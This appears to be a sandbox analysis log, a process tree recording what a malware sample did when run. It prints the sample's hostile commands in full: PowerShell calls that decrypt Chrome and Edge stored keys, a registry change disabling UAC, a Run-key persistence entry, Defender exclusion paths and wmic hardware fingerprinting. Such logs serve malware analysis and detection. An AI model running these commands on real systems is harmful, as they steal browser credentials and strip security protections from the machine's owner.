PID 4700 wrote to memory of 5992	4700	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	262
PID 6012 wrote to memory of 4400	6012	cmd.exe	125
PID 6012 wrote to memory of 4400	6012	cmd.exe	125
PID 4464 wrote to memory of 4408	4464	cmd.exe	126
PID 4464 wrote to memory of 4408	4464	cmd.exe	126
PID 544 wrote to memory of 3024	544	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	322
PID 544 wrote to memory of 3024	544	2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe	322

C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xP234bAy5w.ps1""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xP234bAy5w.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xxcnvwhw\xxcnvwhw.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4432
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E1B.tmp" "c:\Users\Admin\AppData\Local\Temp\xxcnvwhw\CSC20AB36C5135941E7B7B343249F07FC8.TMP"
        5⤵
        
        PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5676
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:5444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4476
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
    3⤵
    - Adds Run key to start application
    PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.KHsds8rjHx""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.KHsds8rjHx"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:4408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
  2⤵
  PID:5992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:1284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:4612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:5352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:6100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:2904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:5660
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:5616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
  2⤵
  PID:5040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:660
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\58uBnjqSHi.ps1""
      4⤵
      PID:3024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\58uBnjqSHi.ps1"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3192
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\24kxe2kt\24kxe2kt.cmdline"
        6⤵
        
        PID:4672
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B4.tmp" "c:\Users\Admin\AppData\Local\Temp\24kxe2kt\CSC2AB8B35DB3694FB28C35F3A3E61BE58.TMP"
        7⤵
        
        PID:4684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4896
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:6096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2504
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:1348
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:4092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5760
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:1792
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        Adds Run key to start application
        
        PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.EhKM7gtD0e""
      4⤵
      PID:2472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.EhKM7gtD0e"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:4108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5668
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4404
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:4964
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:3400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:3488
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:5004
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:1856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4456
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:1292
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:2644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:928
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:5568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
PID:6108
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  PID:5112
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:3484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xilvkJCpHt.ps1""
      4⤵
      PID:5992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\xilvkJCpHt.ps1"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3104
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cgaoxj3m\cgaoxj3m.cmdline"
        6⤵
        
        PID:4500
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8453.tmp" "c:\Users\Admin\AppData\Local\Temp\cgaoxj3m\CSC54E84CFC23054223BF4944BBF1458414.TMP"
        7⤵
        
        PID:2164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1652
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2100
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
